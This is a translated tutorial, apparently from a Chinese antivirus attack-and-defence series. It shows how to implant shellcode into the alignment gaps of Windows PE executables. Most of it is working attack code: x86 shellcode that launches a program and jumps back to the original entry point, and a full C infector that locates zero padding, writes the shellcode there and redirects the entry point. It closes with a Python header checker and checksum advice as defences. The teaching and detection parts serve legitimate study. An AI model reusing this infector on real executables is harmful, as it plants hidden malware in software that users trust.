Anti-Virus Attack and Defense study article 004th: Code implantation using gaps

Source: Internet
Author: User

1. Preface

Nowadays many websites offer downloads of all kinds of software, which gives attackers a convenient opportunity to implant viruses and Trojans: they embed their own malicious code in a normal program and publish the result on a website. When a user downloads and runs such a program the computer is infected, and the virus may then go on to infect other programs on the machine, or even spread across the network or via USB flash drives, widening its reach. This article analyzes how such infection is implemented. First, gaps in a normal program are located so that the "virus" (simulated here by a dialog box) can be implanted; the target program is then infected so that it starts the virus. After that discussion I will, as before, analyze how to defend against this kind of attack, which is the real focus of this article.


2. Searching for gaps in the program

If you want to write code into a normal program, you first need to know whether the target program has enough space for it. There are generally two methods. The first is to add a section so that there is enough room for the virus; this is not good for hiding, since it practically announces "I am a virus" to antivirus engineers, but I will still discuss it in a later article. The second is to find gaps in the program and implant the code there. In PE files, because of alignment, there is normally unused space between one section and the next; this is the program's gap. As long as the malicious code is no longer than the gap, it can be written into this space. This article covers the second method.

For simplicity I reuse the shellcode written in the previous article. In that article the shellcode was written into the password file: the password verification program read the file, overflowed, executed the shellcode, and the shellcode then launched the virus program. This time the intermediate steps are skipped and the shellcode is written directly into a normal program, so running that program runs the "virus" directly, which is more concealed and more easily triggered. The earlier shellcode, with some modifications, is defined as follows:

char shellcode[] =
    "\x33\xdb"                  // xor  ebx,ebx
    "\x53"                      // push ebx
    "\x68\x2e\x65\x78\x65"      // push 0x6578652e   ".exe"
    "\x68\x48\x61\x63\x6b"      // push 0x6b636148   "Hack"
    "\x8b\xc4"                  // mov  eax,esp
    "\x53"                      // push ebx
    "\x50"                      // push eax
    "\xb8\x31\x32\x86\x7c"      // mov  eax,0x7c863231
    "\xff\xd0"                  // call eax
    "\xb8\x90\x90\x90\x90"      // mov  eax,OEP   (the four 0x90 bytes are overwritten with the original entry point)
    "\xff\xe0\x90";             // jmp  eax

Note that because we will change the program's entry point to the entry point of the shellcode, the shellcode must jump back to the original entry point after it finishes; that is why the mov eax and jmp eax instructions are appended to the original shellcode. The four bytes following the mov opcode are where the OEP of the original program is written, and the jmp then transfers execution back to the original program. Because the original shellcode contained exit code, the part that called ExitProcess also had to be removed.

The code for searching for gaps in a program is as follows:

DWORD SearchSpace(LPVOID lpBase, PIMAGE_NT_HEADERS pNtHeader)
{
    // the first section header follows the optional header; it is assumed to be the code section
    PIMAGE_SECTION_HEADER pSec = (PIMAGE_SECTION_HEADER)((BYTE *)&(pNtHeader->OptionalHeader) + pNtHeader->FileHeader.SizeOfOptionalHeader);
    // file offset of the last position in the section's raw data where the shellcode still fits
    DWORD dwAddr = pSec->PointerToRawData + pSec->SizeOfRawData - sizeof(shellcode);
    dwAddr = (DWORD)((BYTE *)lpBase + dwAddr);
    // lowest address worth testing: the end of the section's real contents (PointerToRawData + VirtualSize)
    DWORD dwLow = (DWORD)((BYTE *)lpBase + pSec->PointerToRawData + pSec->Misc.VirtualSize);
    // allocate a shellcode-sized buffer filled with 0 to compare against
    LPVOID lp = malloc(sizeof(shellcode));
    memset(lp, 0, sizeof(shellcode));
    while (dwAddr >= dwLow) {
        // look for a run of 00 bytes as long as the shellcode
        int nRet = memcmp((LPVOID)dwAddr, lp, sizeof(shellcode));
        // memcmp returns 0 when such a run exists; return its address
        if (nRet == 0) {
            free(lp);
            return dwAddr;
        }
        // step back one byte and keep searching towards the start of the gap
        dwAddr--;
    }
    free(lp);
    return 0;
}

The code above searches the unused space between the code section's real contents and the next section, starting from the end of the code section's raw data and searching backwards.


3. Implanting the shellcode into the target program

Now we need a main function that calls the function above. The code is as follows:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FILENAME "helloworld.exe"   // name of the file to be infected

int main()
{
    HANDLE hFile = NULL;
    HANDLE hMap = NULL;
    LPVOID lpBase = NULL;

    // map the target file read/write so headers and section data can be patched in place
    hFile = CreateFile(FILENAME, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        return 0;
    }
    hMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, NULL);
    lpBase = MapViewOfFile(hMap, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);

    PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)lpBase;
    PIMAGE_NT_HEADERS pNtHeader = NULL;
    // verify the PE file: e_magic must be "MZ"
    if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
        UnmapViewOfFile(lpBase);
        CloseHandle(hMap);
        CloseHandle(hFile);
        return 0;
    }
    // locate the Signature field through e_lfanew
    pNtHeader = (PIMAGE_NT_HEADERS)((BYTE *)lpBase + pDosHeader->e_lfanew);
    // verify the PE file: Signature must be "PE\0\0"
    if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) {
        UnmapViewOfFile(lpBase);
        CloseHandle(hMap);
        CloseHandle(hFile);
        return 0;
    }
    // search for a gap in the PE file
    DWORD dwAddr = SearchSpace(lpBase, pNtHeader);
    if (dwAddr == 0) {
        // no gap large enough for the shellcode
        UnmapViewOfFile(lpBase);
        CloseHandle(hMap);
        CloseHandle(hFile);
        return 0;
    }
    // find the original entry address and copy it into the shellcode (bytes 25 to 28)
    DWORD dwOEP = pNtHeader->OptionalHeader.ImageBase + pNtHeader->OptionalHeader.AddressOfEntryPoint;
    *(DWORD *)&shellcode[25] = dwOEP;
    // copy the shellcode into the gap found above
    // (strlen stops at the 00 byte inside the OEP just written, hence the + 3; see the explanation below)
    memcpy((char *)dwAddr, shellcode, strlen(shellcode) + 3);
    // convert the gap's file offset into an RVA; the two coincide only when the section's
    // VirtualAddress equals its PointerToRawData, so do the conversion explicitly
    PIMAGE_SECTION_HEADER pSec = IMAGE_FIRST_SECTION(pNtHeader);
    dwAddr = dwAddr - (DWORD)(BYTE *)lpBase;
    dwAddr = pSec->VirtualAddress + (dwAddr - pSec->PointerToRawData);
    // make the shellcode entry address the original program's entry point
    pNtHeader->OptionalHeader.AddressOfEntryPoint = dwAddr;

    UnmapViewOfFile(lpBase);
    CloseHandle(hMap);
    CloseHandle(hFile);
    return 0;
}

Because the shellcode is implanted into an executable file, and only an executable can start it, the format of the target file must be checked first. The usual check is whether the MZ and PE signatures are present. One more point: the statement that copies the shellcode into the gap uses memcpy with strlen(shellcode) + 3 as its third argument. The 3 is added because strlen stops at the first \x00 byte and treats the string as ending there. A program's OEP is usually of the form 0x004xxxxx, which in little-endian storage becomes xxxxx400. In my shellcode the three bytes after that 00 (\xff \xe0 \x90) are therefore not counted by strlen, because it is truncated at the 00, so 3 must be added.


4. "Infecting" a program

To test our "infector" program, I write another helloworld program with the following code:

#include <stdio.h>

int main()
{
    printf("Hello world!\n");
    getchar();
    return 0;
}
Put the helloworld.exe produced by compiling and linking this code in the same directory as the "infector" program, run the infector, and then open helloworld.exe in a hex editor. Our code has been implanted, as shown below:


Figure 1 Viewing the embedded code in a hex editor

Viewing the implanted code in OllyDbg:


Figure 2 The embedded code viewed in OllyDbg

When the program is loaded in OllyDbg, the address of our implanted shellcode is shown directly; the program's original OEP has clearly been modified. At the end of the shellcode it jumps to the program's original entry point and continues executing the original program. PEiD also shows the difference before and after "infection" clearly:

Figure 3 before being infected


Figure 4 after being infected

Running the infected program, as shown below:


Figure 5 Running the "infected" program

Both the dialog box that simulates the virus and the original helloworld.exe have run, which shows that the "infection" succeeded.

Here we changed the program's entry point directly to the entry address of our shellcode. This is not really good for hiding the "virus"; to be more confusing, the shellcode could be implanted inside the helloworld code itself, or even split into several pieces before implantation, which makes it harder to discover. That will not be discussed in detail here.
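Both the alignment gap exploited in section 2 and the redirected entry point seen in OllyDbg leave traces in the file headers that a defender can check without running the program. The following Python script is an added example written for this article, not code from the original post: check_pe parses the DOS, NT and section headers, reports an entry point that falls in a section's padding (the bytes between VirtualSize and SizeOfRawData) and flags padding that is not all zero. The image it scans is constructed in memory by build_pe, a hypothetical helper, so no real binary is needed.

```python
import struct

# PE32 AddressOfEntryPoint offset within the optional header and section-header size
OPT_ENTRY, SEC_HDR_LEN = 16, 40

def build_pe(entry_rva, slack_bytes=b""):
    """Constructed minimal PE32 image (not a real program): one section ".text"
    with VirtualSize 0x100 but SizeOfRawData 0x200, i.e. 0x100 bytes of padding."""
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                # Magic: PE32
    struct.pack_into("<I", opt, OPT_ENTRY, entry_rva)    # AddressOfEntryPoint
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x102)
    # section header: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    sec = struct.pack("<8sIIII", b".text", 0x100, 0x1000, 0x200, 0x200) + bytes(16)
    hdr = bytearray(64)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 64)                # e_lfanew
    hdr += b"PE\0\0" + file_hdr + opt + sec
    hdr += bytes(0x200 - len(hdr))                       # pad headers up to PointerToRawData
    text = b"\xC3" * 0x100                               # section contents covering VirtualSize
    slack = slack_bytes + bytes(0x100 - len(slack_bytes))  # alignment gap, normally all zero
    return bytes(hdr + text + slack)

def check_pe(pe):
    """Parse the headers and report signs of the gap-implant technique."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]       # FileHeader.NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]  # FileHeader.SizeOfOptionalHeader
    opt = e_lfanew + 24
    entry = struct.unpack_from("<I", pe, opt + OPT_ENTRY)[0]
    report = {"entry_rva": entry, "entry_in_section": False,
              "entry_in_padding": False, "dirty_padding": []}
    for i in range(nsec):
        off = opt + opt_size + i * SEC_HDR_LEN
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, off)
        name = name.rstrip(b"\0").decode()
        if va <= entry < va + vsize:
            report["entry_in_section"] = True
        elif va + vsize <= entry < va + rawsize:
            report["entry_in_padding"] = True     # OEP redirected into the alignment gap
        padding = pe[rawptr + vsize:rawptr + rawsize]   # bytes past VirtualSize, expected to be 00
        if any(padding):
            report["dirty_padding"].append(name)
    return report
```

Run the same check against a copy of a vendor binary and its installed counterpart: an entry point outside every section's VirtualSize, or non-zero padding, is worth a closer look even when the file size is unchanged.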


5. Discussion of preventive measures

Because this "infection" method embeds its code in the program's gap, it does not change the size of the original program, though admittedly that is partly because the example here is simple and the shellcode is short. This achieves a degree of hiding, but there are still ways to defend against it. Software companies generally publish checksums for their products, computed with MD5, SHA-1 or CRC32. The result is unique to the file, so even a small change to the original program (this time only 32 bytes of content were modified) gives a different result. For important files such as programs or DLLs, the vendor officially publishes the genuine checksum values, so it is easy to find out whether such files have been tampered with. Returning to helloworld.exe, here it is checked with "Eye of Fire" before and after "infection":


Figure 6 before "infection"

Figure 7 after "infection"

We recommend verifying with several methods. An MD5 collision could make the results before and after infection the same, but with current technology it is not possible to modify a file while keeping the results of every verification method unchanged. Making good use of checksums can therefore protect your computer from many threats.

For this attack method I do not plan to write a removal tool this time; the tool from the previous article is sufficient. Cleaning up an infected file is more troublesome and will not be discussed here; it may be covered in a future article.


6. Summary

This article briefly discussed how to implant shellcode using gaps in the PE structure. In my opinion, knowledge of the PE format is the foundation of many advanced techniques and must be mastered. Future articles will explain, from more perspectives, how the PE format can be used to implement "virus" attacks and how to prevent them. I stress again that the purpose of this discussion is to help everyone learn more about computer security, not to apply it to improper ends. The methods described here cannot get past antivirus software: even this infected program is listed as a key suspect by "Eye of Fire". So do not do something you will regret for a moment's gain.
